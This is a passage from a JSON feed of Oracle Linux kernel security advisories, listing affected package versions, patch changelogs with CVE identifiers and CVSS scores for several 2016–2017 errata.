"bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9555"], "modified": "2016-12-07T00:00:00", "id": "ELSA-2016-3648", "href": "http://linux.oracle.com/errata/ELSA-2016-3648.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:49:06", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-696.1.1.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-696.1.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-696.1.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-696.1.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-696.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-696.1.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}], "description": "[2.6.32-696.1.1]\n- [block] fix use-after-free in seq file (Denys Vlasenko) [1418548 1418549] {CVE-2016-7910}\n- [firmware] Replacing the chelsio firmware (t4,t5)fw-1.15.37.0 (Sai Vemuri) [1433865 1425749]\n- [kernel] genirq: Avoid taking sparse_irq_lock for non-existent irqs (Dave Wysochanski) [1428106 1360930]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf (Herton R. Krzesinski) [1429917 1429918] {CVE-2017-2636}", "edition": 3, "reporter": "Oracle", "published": "2017-04-11T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7910", "CVE-2017-2636"], "modified": "2017-04-11T00:00:00", "id": "ELSA-2017-0892", "href": "http://linux.oracle.com/errata/ELSA-2017-0892.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:11", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-103.9.4.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-103.9.4.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-103.9.4.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-103.9.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-103.9.4.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-103.9.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-103.9.4.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-103.9.4.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-103.9.4.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-103.9.4.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-103.9.4.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-103.9.4.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.9.4.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-103.9.4.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.9.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-103.9.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}], "description": "[4.1.12-103.9.4]\n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180]\n[4.1.12-103.9.3]\n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681]", "edition": 3, "reporter": "Oracle", "published": "2017-11-13T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-12192", "CVE-2017-2618"], "modified": "2017-11-13T00:00:00", "id": "ELSA-2017-3640", "href": "http://linux.oracle.com/errata/ELSA-2017-3640.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:15", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.16.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.16.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.16.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.16.2.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.16.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.16.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.16.2.el6uek-0.4.5-3.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-118.16.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.16.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.16.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.16.2.el7uek-0.4.5-3.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-118.16.2.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.16.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.16.2.el7uek-0.4.5-3.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.16.2.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.16.2.el6uek-0.4.5-3.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.16.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.16.2.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.16.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.16.2.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.16.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.16.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.16.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.16.2.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "kernel-uek\n[3.8.13-118.16.2]\n- net: avoid signed overflows for SO_{SND|RCV}BUFFORCE (Eric Dumazet) [Orabug: 25203623] {CVE-2016-9793}\n[3.8.13-118.16.1]\n- nvme: Limit command retries (Ashok Vairavan) [Orabug: 25374794] \n- tcp: fix use after free in tcp_xmit_retransmit_queue() (Eric Dumazet) [Orabug: 25374371] {CVE-2016-6828}\n- logging errors that get masked to EIO inside drivers/block/loop.c (Manjunath Patil) [Orabug: 22505535] \n- ALSA: pcm : Call kill_fasync() in stream lock (Takashi Iwai) [Orabug: 25203963] {CVE-2016-9794}\n- packet: fix race condition in packet_set_ring (Philip Pettersson) [Orabug: 25217756] {CVE-2016-8655}\n- x86: kvmclock: zero initialize pvclock shared memory area (Igor Mammedov) [Orabug: 25218431] \n- KEYS: Fix short sprintf buffer in /proc/keys show function (David Howells) [Orabug: 25306373] {CVE-2016-7042}", "edition": 3, "reporter": "Oracle", "published": "2017-01-12T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9794", "CVE-2016-8655", "CVE-2016-9793", "CVE-2016-6828", "CVE-2016-7042"], "modified": "2017-01-12T00:00:00", "id": "ELSA-2017-3509", "href": "http://linux.oracle.com/errata/ELSA-2017-3509.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:49:07", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.294.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.294.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.294.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.294.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.294.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.294.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.294.1.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.294.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.294.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.294.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.294.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.294.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.294.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.294.1.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.294.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.294.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.294.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.294.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.294.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.294.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.294.1.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.294.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.294.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.294.1.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.294.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.294.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.294.1.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.294.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.294.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.294.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[2.6.39-400.294.1]\n- nvme: Limit command retries (Ashok Vairavan) [Orabug: 25342947] \n- tcp: fix use after free in tcp_xmit_retransmit_queue() (Eric Dumazet) [Orabug: 25374376] {CVE-2016-6828}\n- ALSA: pcm : Call kill_fasync() in stream lock (Takashi Iwai) [Orabug: 25231728] {CVE-2016-9794}\n- net: avoid signed overflows for SO_{SND|RCV}BUFFORCE (Eric Dumazet) [Orabug: 25231758] {CVE-2016-9793}\n- KEYS: Fix short sprintf buffer in /proc/keys show function (David Howells) [Orabug: 25306377] {CVE-2016-7042}", "edition": 3, "reporter": "Oracle", "published": "2017-01-12T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9794", "CVE-2016-9793", "CVE-2016-6828", "CVE-2016-7042"], "modified": "2017-01-12T00:00:00", "id": "ELSA-2017-3510", "href": "http://linux.oracle.com/errata/ELSA-2017-3510.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:33", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.25.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.25.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.25.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.25.el6uek-0.5.3-2.el6.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.25.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.25.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.25.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.25.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.25.el7uek-0.5.3-2.el7.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.25.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.25.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "noarch", "packageFilename": 